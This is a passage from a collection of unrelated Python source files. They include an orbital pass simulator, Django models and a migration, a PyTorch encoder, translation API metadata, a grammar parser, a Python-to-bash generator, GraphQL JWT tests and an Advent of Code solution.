passes of the Spacecraft over GroundStations.
"""
# Flag that indicates whether the simulator should assume that it is
# being used for a test and, therefore, return hard coded results. These
# hard-coded results can be used instead of unpredictable slots and,
# therefore, the behavior of the functions that depend on the results of
# the simulations can be verified.
_test_mode = False
# Flag that indicates whether the invocation of one of the methods that
# internally calls the routines for the actual mathematical simulations
# must raise an Exception instead of properly executing the method itself.
_fail_test = False
def set_debug(self, on=True, fail=False):
"""
This method sets the OrbitalSimulator debug mode ON (on=True) or OFF
(on=False). Default: on=True
:param on: Flag that enables/disables the debug mode
:param fail: Flag that triggers a simulated exception
"""
self._test_mode = on
self._fail_test = fail
def get_debug(self):
"""Returns the debug flag for the Simulation object.
:return: boolean debug flag.
"""
return self._test_mode
# Observer for the simulation (GroundStation simulation object).
_observer = None
# Body for the simulation (Spacecraft simulation object).
_body = None
# TLE in use for the simulation (taken from Spacecraft).
_tle = None
@staticmethod
def normalize_string(l0, l1, l2):
"""Static method
Normalizes the three parameters from unicode to string, in case it is
necessary.
:param l0: Line#0 of the TLE file
:param l1: Line#1 of the TLE file
:param l2: Line#2 of the TLE file
:return: Tuple (l0, l1, l2)
OLD encoding change from str to 'ascii', Python 2.7
if isinstance(l0, str):
l0 = unicodedata.normalize('NFKD', l0).encode('ascii', 'ignore')
if isinstance(l1, str):
l1 = unicodedata.normalize('NFKD', l1).encode('ascii', 'ignore')
if isinstance(l2, str):
l2 = unicodedata.normalize('NFKD', l2).encode('ascii', 'ignore')
"""
if isinstance(l0, bytes):
l0 = str(l0, 'ascii')
if isinstance(l1, bytes):
l1 = str(l1, 'ascii')
if isinstance(l2, bytes):
l2 = str(l2, 'ascii')
return l0, l1, l2
@staticmethod
def check_tle_format(l0, l1, l2):
"""Static method
Checks whether the format for a given TLE is correct or not.
:param l0: Line#0 of the TLE file
:param l1: Line#1 of the TLE file
:param l2: Line#2 of the TLE file
:return: True if the operation could successfully be completed
"""
l0, l1, l2 = OrbitalSimulator.normalize_string(l0, l1, l2)
ephem.readtle(l0, l1, l2)
return True
@staticmethod
def _create_test_operational_slots(
start, end, minimum_duration=datetime.timedelta(minutes=5)
):
"""
Static method that creates the OperationalSlots to be used for
testing purposes.
:return: List with the testing OperationalSlots.
"""
if start is None:
now = misc.get_now_utc()
return [(now, now + minimum_duration)]
if end is None:
return [(start, start + minimum_duration)]
return [(start, end)]
@staticmethod
def ephem_date_2_utc_datetime(e_date):
"""
Method that converts an Ephem.date object into a Python Datetime object
located in the UTC timezone.
:param e_date: The Ephem.date object to be converted.
:return: The resulting Python UTC-aware Datetime object.
"""
return misc.localize_datetime_utc(e_date.datetime())
@staticmethod
def datetime_2_ephem_string(dt):
"""
Converts a datetime object into a string that can be used as an input
for the Ephem implementation of the Date object: 'yyyy/mm/dd hh:ii:ss'
:param dt: Datetime object to be converted.
:return: String to be used as an input for the date object.
"""
if dt is None:
dt = misc.get_today_utc()
return dt.strftime("%Y/%m/%d %H:%M:%S")
@staticmethod
def dbtle_2_ephem_str(spacecraft_tle):
"""
Converts into the proper format required by the Ephem objects the TLE
information contained in the database object.
:param spacecraft_tle: TLE object from the database.
:return: (name, line_1, line_2) in str format.
"""
return misc.unicode_2_string(spacecraft_tle.identifier),\
misc.unicode_2_string(spacecraft_tle.first_line),\
misc.unicode_2_string(spacecraft_tle.second_line)
def set_groundstation(self, groundstation):
"""
Creates an PyEphem observer object with the data from a GroundStation
object.
:param groundstation: Object from where to take the data required
"""
self._observer = ephem.Observer()
self._observer.lat = gis.decimal_2_degrees(groundstation.latitude)
self._observer.lon = gis.decimal_2_degrees(groundstation.longitude)
self._observer.horizon = gis.decimal_2_degrees(
groundstation.contact_elevation
)
self._observer.elevation = groundstation.altitude
def set_spacecraft(self, spacecraft_tle):
"""
Creates an PyEphem body object with the data from a Spacecraft object.
:param spacecraft_tle: Spacecraft's tle as obtained by invoking the
method "get" of the <services.configuration.models.TwoLineElement>.
"""
self._tle = spacecraft_tle
l0, l1, l2 = OrbitalSimulator.dbtle_2_ephem_str(spacecraft_tle)
self._body = OrbitalSimulator.create_spacecraft(l0, l1, l2)
@staticmethod
def create_spacecraft(l0, l1, l2):
"""
Method to convert a Spacecraft object from the database into a PyEphem
spacecraft that can be used with that same library for simulation
purposes.
:param l0: Line#0 of the TLE file.
:param l1: Line#1 of the TLE file.
:param l2: Line#2 of the TLE file.
:return: The object that has to be used with the PyEphem library.
:raises: ObjectDoesNotExist in case there is no such tle_id in the
database.
"""
l0, l1, l2 = OrbitalSimulator.normalize_string(l0, l1, l2)
return ephem.readtle(l0, l1, l2)
@staticmethod
def get_update_duration():
"""Update window duration.
This method returns the number of days for which the slots should be
populated in the future.
:return: Number of days as a datetime.timedelta object.
"""
return datetime.timedelta(days=1)
@staticmethod
def get_update_window():
"""Population window slot.
Static method that returns the time window for which the slots should
be populated. Initially the slots should be populated from the end of
the simulation window to N days after.
:return: 2-tuple object with the start and the end of the window.
"""
s_window = OrbitalSimulator.get_simulation_window()
return (
s_window[1],
s_window[1] + OrbitalSimulator.get_update_duration()
)
@staticmethod
def get_window_duration():
"""Simulation window duration.
Static method that returns the duration of the window for the
Simulation calculations of the slots.
"""
return datetime.timedelta(days=3)
@staticmethod
def get_simulation_window():
"""Simulation window slot.
Static method that returns the current 'in-use' simulation window,
this is, the start and end datetime objects for the simulation of the
slots that is currently being used.
:return: Tuple (start, end) with the simulation window currently in
use (UTC localized).
"""
# From the 'window duration', 1 day has to be subtracted (the day in
# course).
start = misc.get_now_utc()
end = misc.get_next_midnight()\
+ OrbitalSimulator.get_window_duration()\
- datetime.timedelta(days=1)
return start, end
def calculate_passes(self, availability_slots):
"""
Calculates the passes for the given spacecraft over the ground_station,
for all the availability slots included in the list.
:param availability_slots: List of tuples with UTC DateTime objects
defining the slots of availability.
:return: A list with all the pass slots linked with the AvailabilitySlot
that generated them.
"""
pass_slots = []
for a_slot_i in availability_slots:
pass_i = self.calculate_pass_slot(a_slot_i[0], a_slot_i[1])
pass_i_id = a_slot_i[2]
pass_slots.append((pass_i, pass_i_id))
return pass_slots
def calculate_pass_slot(
self, start, end, minimum_slot_duration=datetime.timedelta(minutes=1)
):
"""
Calculates the passes available for the given spacecraft in between the
start and end dates.
:param start: The datetime object (UTC) that defines the start of the
simulation.
:param end: The datetime object (UTC) that defines the end of the
simulation.
:param minimum_slot_duration: The minimum duration of a slot
:return: List with the datetime objects (UTC) with the passes for
the given Spacecraft over the given GroundStation
:raises ephem.CircumpolarError: Raised whenever, for a given
simulation, the satellite is either always up or never shows up above the
defined horizon.
"""
if self._test_mode:
if self._fail_test:
raise Exception('TEST TEST TEST EXCEPTION')
return OrbitalSimulator._create_test_operational_slots(start, end)
pass_slots = []
self._observer.date = OrbitalSimulator.datetime_2_ephem_string(start)
last_end = start
while last_end < end:
tr, azr, tt, altt, ts, azs = self._observer.next_pass(self._body)
self._body.compute(self._observer)
if not tr or not ts:
return pass_slots
dt_tr = misc.localize_datetime_utc(tr.datetime())
dt_ts = misc.localize_datetime_utc(ts.datetime())
if dt_tr > end:
break
if dt_ts > end:
slot_end = end
else:
slot_end = dt_ts
if (slot_end - dt_tr) > minimum_slot_duration:
pass_slots.append((dt_tr, slot_end))
self._observer.date = ts + ephem.minute
last_end = misc.localize_datetime_utc(
self._observer.date.datetime()
)
return pass_slots
@staticmethod
def arrays_2_groundtrack(timestamps, latitudes, longitudes):
"""
Converts the 3 oArrays into a single groundtrack array with objects as
items.
:param timestamps: array with the timestamps
:param latitudes: array with the latitudes
:param longitudes: array with the longitudes
:return: Array where each element is { timestamp, latitude, longitude }.
The first timestamp is "start" and the last one is
"start+floor(duration/timestamp)*timestamp".
"""
gt = []
i = 0
for ts_i in timestamps:
lat_i = latitudes[i]
lng_i = longitudes[i]
gt.append({
'timestamp': ts_i,
'latitude': lat_i,
'longitude': lng_i
})
i += 1
return gt
def calculate_groundtrack(
self, spacecraft_tle,
interval=None,
timestep=py_td(seconds=20)
):
"""
Calculates the GroundTrack for the spacecraft with the given tle object.
:param spacecraft_tle: TLE for the spacecraft
:param interval: simulation interval
:param timestep: time elapsed between two subsequent
points in the ground track
:return: Array where each element is { timestamp, latitude, longitude }.
The first timestamp is "start" and the last one is
"start+floor(duration/timestamp)*timestamp".
"""
if not interval:
interval = OrbitalSimulator.get_simulation_window()
if self._test_mode:
if self._fail_test:
raise Exception('TEST TEST TEST EXCEPTION')
self.set_spacecraft(spacecraft_tle)
groundtrack = []
date_i = interval[0]
while date_i < interval[1]:
self._body.compute(date_i)
lat_i = numpy.rad2deg(self._body.sublat)
lng_i = numpy.rad2deg(self._body.sublong)
groundtrack.append({
'timestamp': date_i,
'latitude': lat_i,
'longitude': lng_i
})
date_i += timestep
return groundtrack
def __unicode__(self):
return '# ### Body (Spacecraft): ' + str(self._body)\
+ '\n* l0 = ' + self._tle.identifier\
+ '\n* l1 = ' + self._tle.first_line\
+ '\n* l2 = ' + self._tle.second_line\
+ '\n# ### Observer (Ground Station):'\
+ '\n* (lat, long) = (' + str(self._observer.lat) + ', '\
+ str(self._observer.lon) + ')'\
+ '\n* elevation = ' + str(self._observer.elevation)\
+ '\n* horizon = ' + str(self._observer.horizon)\
+ '\n* date = ' + str(self._observer.date)
def __str__(self):
return self.__unicode__()
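# Minimal usage sketch (hedged illustration only: `gs` and `tle` are assumed to
# be the GroundStation and TwoLineElement database objects referenced in the
# docstrings above):
#
#   sim = OrbitalSimulator()
#   sim.set_groundstation(gs)
#   sim.set_spacecraft(tle)
#   slots = sim.calculate_pass_slot(*OrbitalSimulator.get_simulation_window())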
|
# -*- coding: utf-8 -*-
# This script combines the theory and simulation results to generate
# new files that are easier to analyze.
import pandas as pd
filename_base_theory = 'D:\\document\\matching probability\\data\\version2\\theory\\'
filename_base_simulation = 'D:\\document\\matching probability\\data\\version2\\simulation_result\\'
filename_base_combine_theory_simulation = 'D:\\document\\matching probability\\data\\version2\\combined_theory_simulation\\'
column_names = ['seeker_probability', 'taker_waiting_probability', 'taker_traveling_probability', 'whole_matching_probability',
'traveling_distance', 'shared_distance', 'save_distance']
name_prefixes = ['theory_', 'simulation_']
pick_up_waiting_time_list = [1,2,4,6,8,10]
maximum_matching_radius_list = [0,1,2,4,6,8,10]
maximum_detour_time_list = [0,1,2,4,6,8,10]
scale_list = [1,0.5,0.1,0.06,0.04,0.02,0.01,0.001]
def get_theory_result_for_one_scenario(pi, ri, di, si):
filename_extra_term = str(pi) + '_' + str(ri) + '_' + str(di) + '_' + str(si) + '.txt'
filename = filename_base_theory + filename_extra_term
df = pd.read_csv(filename, sep = '\t', skiprows = 2, names = column_names)
return df
def get_simulation_result_for_one_scenario(pi, ri, di, si):
filename_extra_term = str(pi) + '_' + str(ri) + '_' + str(di) + '_' + str(si) + '.csv'
filename = filename_base_simulation + filename_extra_term
df = pd.read_csv(filename, sep = ',')
return df
def combine_theory_simulation_for_one_scenario(pi, ri, di, si):
filename_extra_term = str(pi) + '_' + str(ri) + '_' + str(di) + '_' + str(si) + '.csv'
df_theory = get_theory_result_for_one_scenario(pi, ri, di, si)
df_simulation = get_simulation_result_for_one_scenario(pi, ri, di, si)
new_column_names = []
for column_name in column_names:
for name_prefix in name_prefixes:
new_column_names.append(name_prefix + column_name)
df_combine = pd.DataFrame(columns = new_column_names)
for column_name in column_names:
df_combine['theory_' + column_name] = df_theory[column_name]
df_combine['simulation_' + column_name] = df_simulation[column_name]
filename_combine = filename_base_combine_theory_simulation + filename_extra_term
df_combine.to_csv(filename_combine, sep = ',', index = False)
return df_combine
def combine_theory_simulation_for_all_scenarios():
for pi in range(len(pick_up_waiting_time_list)):
for ri in range(len(maximum_matching_radius_list)):
for di in range(len(maximum_detour_time_list)):
for si in range(len(scale_list)):
combine_theory_simulation_for_one_scenario(pi, ri, di, si)
if __name__ == "__main__":
combine_theory_simulation_for_all_scenarios()
#combine_theory_simulation_for_one_scenario(0, 2, 3, 2)
|
from django.db import models
# Create your models here.
class User(models.Model):
uid = models.IntegerField(primary_key=True)
age = models.PositiveSmallIntegerField()
sex = models.CharField(max_length=5, choices=(("M", "Man"), ("F", "Woman")))
postal_code = models.CharField(max_length=500)
occupation = models.ForeignKey('Occupation', on_delete=models.CASCADE)
def __str__(self):
return str(self.uid)
class Occupation(models.Model):
name = models.CharField(max_length=500)
def __str__(self):
return self.name
class Category(models.Model):
cid = models.IntegerField(primary_key=True)
name = models.TextField(max_length=500)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "categories"
class Film(models.Model):
fid = models.IntegerField(primary_key=True)
title = models.CharField(max_length=100)
year = models.DateField(null=True, blank=True)
url = models.URLField()
rating = models.ManyToManyField(User, through='Rate')
categories = models.ManyToManyField(Category)
def __str__(self):
return self.title
class Rate(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
film = models.ForeignKey(Film, on_delete=models.CASCADE)
number = models.SmallIntegerField()
def __str__(self):
return str(self.number)
|
"""
Piecewise convolutional networks as encoder
"""
import torch
import torch.nn as nn
class PcnnEncoder(nn.Module):
def __init__(self, opt):
super(PcnnEncoder, self).__init__()
self.opt = opt
self.activation = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(opt.dropout_keep)
self.cnn = nn.Conv2d(
in_channels=1,
out_channels = opt.hidden_size,
kernel_size=(opt.cnn_window_size, opt.word_vec_size + 2*opt.position_size),
stride=(1,1),
padding=(1, 0)
)
def forward(self, embeddings, masks):
"""
Encode embeddings, using piece-wise convolutional networks.
Here, we suppose the total number of sentences in bags is batch_size.
Args:
embeddings: [batch_size, num_step, embedding_size]
masks: [batch_size, num_step]
Return:
hidden state of each sentence: [batch_size, hidden_size]
"""
# embeddings = torch.unsqueeze(embeddings, dim=1)
embeddings.unsqueeze_(dim=1)
x = self.cnn(embeddings) # [batch_size, out_channel, num_step, 1]
masks.unsqueeze_(dim=1) # [batch_size, 1, num_step, 3]
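# NOTE (assumed convention, not stated in this file): `masks` appears to encode
# piece membership as large constant offsets (on the order of 100), so taking the
# max of `masks + x` over the time dimension yields one maximum per sentence
# piece; the constant offset is then removed by the `x - 100` below.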
x, _ = torch.max(masks + x, dim=2)
x = x - 100
x = x.view(-1, self.opt.hidden_size * 3)
return self.dropout(self.activation(x))
|
# -*- coding: utf-8 -*-
DESC = "tmt-2018-03-21"
INFO = {
"TextTranslate": {
"params": [
{
"name": "SourceText",
"desc": "待翻译的文本,文本统一使用utf-8格式编码,非utf-8格式编码字符会翻译失败,请传入有效文本,html标记等非常规翻译文本会翻译失败。单次请求的文本长度需要低于2000。"
},
{
"name": "Source",
"desc": "源语言,参照Target支持语言列表"
},
{
"name": "Target",
"desc": "目标语言,参照支持语言列表\n<li> zh : 中文 </li> <li> en : 英文 </li><li> jp : 日语 </li> <li> kr : 韩语 </li><li> de : 德语 </li><li> fr : 法语 </li><li> es : 西班牙文 </li> <li> it : 意大利文 </li><li> tr : 土耳其文 </li><li> ru : 俄文 </li><li> pt : 葡萄牙文 </li><li> vi : 越南文 </li><li> id : 印度尼西亚文 </li><li> ms : 马来西亚文 </li><li> th : 泰文 </li><li> auto : 自动识别源语言,只能用于source字段 </li>"
},
{
"name": "ProjectId",
"desc": "项目id"
}
],
"desc": "提供中文到英文、英文到中文的等多种语言的文本内容翻译服务, 经过大数据语料库、多种解码算法、翻译引擎深度优化,在新闻文章、生活口语等不同语言场景中都有深厚积累,翻译结果专业评价处于行业领先水平。\n"
},
"ImageTranslate": {
"params": [
{
"name": "SessionUuid",
"desc": "唯一id,返回时原样返回"
},
{
"name": "Scene",
"desc": "doc:文档扫描"
},
{
"name": "Data",
"desc": "图片数据的Base64字符串,图片大小上限为4M,建议对源图片进行一定程度压缩"
},
{
"name": "Source",
"desc": "源语言,支持语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "Target",
"desc": "目标语言,支持语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "ProjectId",
"desc": "项目id"
}
],
"desc": "提供中文到英文、英文到中文两种语言的图片翻译服务,可自动识别图片中的文本内容并翻译成目标语言,识别后的文本按行翻译,后续会提供可按段落翻译的版本"
},
"SpeechTranslate": {
"params": [
{
"name": "SessionUuid",
"desc": "一段完整的语音对应一个SessionUuid"
},
{
"name": "Source",
"desc": "音频中的语言类型,支持语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "Target",
"desc": "翻译目标语⾔言类型 ,支持的语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "AudioFormat",
"desc": "pcm : 146 amr : 33554432 mp3 : 83886080"
},
{
"name": "Seq",
"desc": "语音分片的序号,从0开始"
},
{
"name": "IsEnd",
"desc": "是否最后一片语音分片,0-否,1-是"
},
{
"name": "Data",
"desc": "语音分片内容的base64字符串,音频内容应含有效并可识别的文本"
},
{
"name": "ProjectId",
"desc": "项目id,用户可自定义"
},
{
"name": "Mode",
"desc": "识别模式,不填则由调用放进行vad(静音检测),填bvad则由服务放进行vad,前者适合段语音翻译(收到所有语音分片后翻译),后者适合长语音翻译(在完成一个断句识别后就会返回部分结果)"
}
],
"desc": "本接口提供音频内文字识别 + 翻译功能,目前开放中到英的语音翻译服务。\n待识别和翻译的音频文件可以是 pcm、mp3、amr和speex 格式,音频内语音清晰,采用流式传输和翻译的方式。\n"
},
"LanguageDetect": {
"params": [
{
"name": "Text",
"desc": "待识别的文本,文本统一使用utf-8格式编码,非utf-8格式编码字符会翻译失败。单次请求的文本长度需要低于2000。"
},
{
"name": "ProjectId",
"desc": "项目id"
}
],
"desc": "可自动识别文本内容的语言种类,轻量高效,无需额外实现判断方式,使面向客户的服务体验更佳。 "
}
}
|
import flask
import config
def render_rivets_client(page_mode, sign_response=None, send_response=None, release_response=None):
return flask.render_template(
"client.html",
page_mode=page_mode,
environment=config.ENVIRONMENT,
public_apigee_url=config.PUBLIC_APIGEE_URL,
base_url=config.BASE_URL,
sign_response=sign_response,
send_response=send_response,
release_response=release_response,
)
def render_react_client(page_mode):
return flask.render_template(
"client_v2.html",
page_mode=page_mode,
environment=config.ENVIRONMENT,
public_apigee_url=config.PUBLIC_APIGEE_URL,
base_url=config.BASE_URL
)
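# Hedged usage sketch (the route and `app` object are hypothetical, not part of this
# module): a Flask view would typically return one of the helpers above, e.g.
#
#     @app.route('/client')
#     def client():
#         return render_rivets_client(page_mode='sign')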
|
from .classic_model import ClassicModel
from .classic_user import ClassicSystemUser
|
from parsimonious import Grammar
ws = r"""
_ = comment / line_comment / ~"\s*"
ws = ~"\s+"
le = ~"(\r\n|\r|\n)"
comment_start = "/*"
comment_end = "*/"
comment_content = comment / (!comment_start !comment_end ~"."s)
comment = comment_start comment_content* comment_end
line_comment = ~"//.*" le
"""
qualifier = r"""
qualifier = "public" / "protected" / "private" / "static" / "final" /
"const" / "native" / "exec" / "cb" /
"abstract" / "persistent" / "inline" / "edit" / "rep"
qualifierlist = (qualifier ws)*
"""
ident = r"""
ident = ~"[a-z_][\w\.]*"ai
number = ~"-?\d+(\.\d*)?f?"ai
string = ~r"\"(?:[^\\\"\\]|\\.)*\""
"""
symbols = r"""
lbrace = "{"
rbrace = "}"
lparen = "("
rparen = ")"
listsep = _ "," _
typesep = _ ":" _
gt = ">"
lt = "<"
equal = "="
"""
annotation = r"""
annotationlist = (annotation ws)*
annotation = "@" ident lparen _ annotation_paramlist? _ rparen
annotation_paramlist = annotation_param (listsep annotation_param)*
annotation_param = number / string / annotation_ident
annotation_ident = ~"[^\,\)]+"ai
"""
type_ = r"""
type = ident _ type_wrapped? _
type_wrapped = lt _ type _ type_arg? _ gt
type_arg_sep = ";" _
type_arg = type_arg_sep type_arg_value*
type_arg_value = !gt ~"."
"""
params = r"""
parameters = lparen _ param_list? _ rparen
param_list = param (listsep param)*
param = param_ident typesep type _
param_ident = param_qualifier ident
param_qualifier = (("out" / "opt") ws)?
"""
function = r"""
func = func_sig _ func_body?
func_sig = annotationlist qualifierlist "func" _ func_name _ parameters _ func_return_type
func_name = ident?
func_return_type = "->" _ type
func_body_start = lbrace
func_body_end = rbrace
func_body_content = func_body / (!func_body_start !func_body_end ~"."s)
func_body = func_body_start func_body_content* func_body_end _
"""
enum = r"""
enum = "enum" ws ident _ enum_body _
enum_body = lbrace _ enum_list? _ rbrace
enum_list = enum_decl (_ listsep _ enum_decl)* listsep?
enum_decl = ident _ equal _ enum_value
enum_value = ~"-?\d+"a
"""
class_ = r"""
class = qualifierlist ("class" / "struct") ws ident _ class_extends? _ class_body
class_extends = "extends" ws ident
class_body = lbrace class_member* rbrace _
class_member = class_field / func / _
class_field = annotationlist qualifierlist "let" ws ident _ typesep _ type _ ";"
"""
grammar = Grammar(
"""
definitions = _ definition*
definition = enum / func / class
"""
+ class_
+ enum
+ annotation
+ function
+ params
+ type_
+ qualifier
+ ws
+ symbols
+ ident
)
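# Hedged usage sketch (the sample source below is hypothetical): parsimonious uses the
# first rule, `definitions`, as the default rule, so `parse` should accept a small
# declaration like this and return a parse tree.
if __name__ == "__main__":
    sample = 'public class Foo extends Bar { let x : Int32; }'
    print(grammar.parse(sample))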
|
import ast
import types
from sherlock.errors import CompileError, SyntaxNotSupportError, FunctionIsNotAnalyzedError
from sherlock.codelib.analyzer.variable import Variables, Type
from sherlock.codelib.analyzer.function import Functions
from sherlock.codelib.generator.temp_variable import TempVariableManager
CONTEXT_STATUS_GLOBAL = 1
CONTEXT_STATUS_FUNCTION = 2
class CodeGenerator(object):
EXTENSIONS = [
'sherlock.codelib.generator.implements.simple_generator',
'sherlock.codelib.generator.implements.compare_op',
'sherlock.codelib.generator.implements.statement',
'sherlock.codelib.generator.implements.binop',
'sherlock.codelib.generator.implements.assignment',
'sherlock.codelib.generator.implements.function',
'sherlock.codelib.generator.implements.importing',
'sherlock.codelib.system_function',
'sherlock.codelib.cmd',
]
def __init__(
self,
code=None,
node=None,
context_status=CONTEXT_STATUS_GLOBAL,
functions=Functions(),
variables=Variables(),
function_info=None
):
for extension in CodeGenerator.EXTENSIONS:
__import__(extension)
self.context_status = context_status
self.global_generator = None
self.functions = functions
self.code = code
self.node = node
self.variables = variables
self.temp_variable = TempVariableManager('__temp_var')
self.code_buffer = []
self.function_info = function_info
@property
def is_global(self):
return self.context_status == CONTEXT_STATUS_GLOBAL
def append_code(self, code):
self.code_buffer.append(code)
def dispatch(self, node, ext_info={}):
from sherlock.codelib.generator.dispatcher import AST_NODE_DISPATCHER
generator = AST_NODE_DISPATCHER.get(node.__class__)
if generator is None:
raise SyntaxNotSupportError("%s is not support yet." % node.__class__.__name__)
return generator(self, node, ext_info)
def generate(self):
if self.node is None:
self.node = ast.parse(self.code)
if isinstance(self.node, ast.Module):
for x in self.node.body:
code_slice = self.dispatch(x)
if code_slice is not None:
self.code_buffer.append(code_slice)
return '\n'.join(self.code_buffer) + '\n'
elif isinstance(self.node, ast.FunctionDef):
if self.function_info is None:
raise FunctionIsNotAnalyzedError(self.node.name)
if not len(self.node.decorator_list) == 0:
                raise SyntaxNotSupportError('Function decorators are not supported yet.')
arguments_list = []
for i, x in enumerate(self.node.args.args):
if self.function_info.args_type[i].is_list:
arguments_list.append('declare -a %s=("${!%i}")' % (self.dispatch(x), i + 1))
else:
arguments_list.append('%s=$%i' % (self.dispatch(x), i + 1))
arguments_code = '\n'.join(arguments_list)
for x in self.node.body:
self.code_buffer.append(self.dispatch(x, {'func_name': self.node.name}))
return 'function %s() {\n%s\n%s\n}' % (self.node.name, arguments_code, '\n'.join(self.code_buffer))
else:
raise CompileError("code section must be function or module node")
def get_type(self, node):
if isinstance(node, ast.Num):
return Type.NUMBER
elif isinstance(node, ast.Str):
return Type.STRING
elif isinstance(node, ast.Name):
if self.variables[node.id] is not None:
return self.variables[node.id].var_type
else:
return Type.VOID
elif isinstance(node, ast.BinOp):
if self.get_type(node.left).is_number and self.get_type(node.right).is_number:
return Type.NUMBER
elif self.get_type(node.left).is_string or self.get_type(node.right).is_string:
return Type.STRING
elif isinstance(node, ast.Call):
return self.functions[node.func.id].return_type
else:
return Type.VOID
|
# -*- coding: utf-8 -*-
"""
:authors: - Tobias Grosch
"""
import os
class RegisterFactory:
@staticmethod
def get_register(arguments, config_parser):
return SimpleRegister()
class SimpleRegister:
def check(self, file_path):
return os.path.isfile(file_path)
def add(self, file_path):
pass
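# Hedged usage sketch (the path below is hypothetical): the factory currently ignores
# its arguments and always returns a SimpleRegister, whose `check` only tests that the
# file exists and whose `add` is a no-op.
if __name__ == '__main__':
    register = RegisterFactory.get_register(arguments=None, config_parser=None)
    print(register.check('/tmp/example.txt'))  # True only if the file exists
    register.add('/tmp/example.txt')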
|
import json
from unittest import mock
from django.contrib.auth import get_user_model
from django.test import RequestFactory, testcases
import graphene
from graphene_django.views import GraphQLView
from graphql.execution.execute import GraphQLResolveInfo
from graphql_jwt.decorators import jwt_cookie
from graphql_jwt.settings import jwt_settings
from graphql_jwt.testcases import JSONWebTokenClient, JSONWebTokenTestCase
from graphql_jwt.utils import jwt_encode, jwt_payload
class UserTestCase(testcases.TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username='test',
password='dolphins',
)
class TestCase(UserTestCase):
def setUp(self):
super().setUp()
self.payload = jwt_payload(self.user)
self.token = jwt_encode(self.payload)
self.request_factory = RequestFactory()
def info(self, user=None, **headers):
request = self.request_factory.post('/', **headers)
if user is not None:
request.user = user
return mock.Mock(
context=request,
path=['test'],
spec=GraphQLResolveInfo,
)
class SchemaTestCase(TestCase, JSONWebTokenTestCase):
class Query(graphene.ObjectType):
test = graphene.String()
Mutation = None
def setUp(self):
super().setUp()
self.client.schema(query=self.Query, mutation=self.Mutation)
def execute(self, variables=None):
assert self.query, ('`query` property not specified')
return self.client.execute(self.query, variables)
def assertUsernameIn(self, payload):
username = payload[self.user.USERNAME_FIELD]
self.assertEqual(self.user.get_username(), username)
class RelaySchemaTestCase(SchemaTestCase):
def execute(self, variables=None):
return super().execute({'input': variables})
class CookieClient(JSONWebTokenClient):
def post(self, path, data, **kwargs):
kwargs.setdefault('content_type', 'application/json')
return self.generic('POST', path, json.dumps(data), **kwargs)
def set_cookie(self, token):
self.cookies[jwt_settings.JWT_COOKIE_NAME] = token
def execute(self, query, variables=None, **extra):
data = {
'query': query,
'variables': variables,
}
view = GraphQLView(schema=self._schema)
request = self.post('/', data=data, **extra)
response = jwt_cookie(view.dispatch)(request)
content = self._parse_json(response)
response.data = content.get('data')
response.errors = content.get('errors')
return response
class CookieTestCase(SchemaTestCase):
client_class = CookieClient
def set_cookie(self):
self.client.set_cookie(self.token)
class RelayCookieTestCase(RelaySchemaTestCase, CookieTestCase):
"""RelayCookieTestCase"""
|
# Generated by Django 2.1.9 on 2019-07-02 03:50
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('contacts', '0005_auto_20190630_0943'),
('hackathons', '0006_sponsorship_notes'),
]
operations = [
migrations.CreateModel(
name='Lead',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('U', 'Uncontacted'), ('C', 'Contacted')], max_length=1)),
('role', models.CharField(choices=[('N', 'None'), ('P', 'Primary')], max_length=1)),
('notes', models.TextField(blank=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('contact', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='leads', to='contacts.Contact')),
],
),
migrations.AddField(
model_name='hackathon',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='hackathon',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='perk',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='perk',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='tier',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='tier',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='sponsorship',
name='status',
field=models.CharField(choices=[('preparing', 'Preparing'), ('contacted', 'Contacted'), ('responded', 'Responded'), ('confirmed', 'Confirmed'), ('denied', 'Denied'), ('ghosted', 'Ghosted'), ('paid', 'Paid')], max_length=12),
),
migrations.AddField(
model_name='lead',
name='sponsorship',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='leads', to='hackathons.Sponsorship'),
),
]
|
#!/usr/bin/env python3
import sys
sys.path.insert(0,'../')
from aoc_input import *
import re
import networkx as nx
if len(sys.argv) != 2:
print('Usage:', sys.argv[0], '<input.txt>')
sys.exit(1)
a = input_as_lines(sys.argv[1])
G = nx.Graph()
for line in a:
    u, v = re.findall(r'([A-Za-z]+)', line)
    if u not in G:
        G.add_node(u)
    if v not in G:
        G.add_node(v)
    G.add_edge(u, v)
num = 0
# print all paths from node to goal
# Algorithm from https://www.geeksforgeeks.org/find-paths-given-source-destination/
def all_paths(node, goal, visited, path):
global num
# Mark the current node as visited and store in path
visited[node] += 1
path.append(node)
#print(node, path)
if node == goal:
#print(path)
num += 1
else:
# Recurse for all adjacent nodes
for neigh in nx.all_neighbors(G, node):
v = visited[neigh]
if v == 0 or neigh.isupper():
# Must copy visited and path here
all_paths(neigh, goal, visited.copy(), path.copy())
# Remove current vertex from path[] and mark it as unvisited
path.pop()
visited[node] -= 1
visited = dict()
for n in G.nodes:
visited[n] = 0
path = []
all_paths('start', 'end', visited, path)
print(num)
|
TEXTS_COLLECTION = "texts"
CHAPTERS_COLLECTION = "chapters"
FRAGMENTS_COLLECTION = "fragments"
|
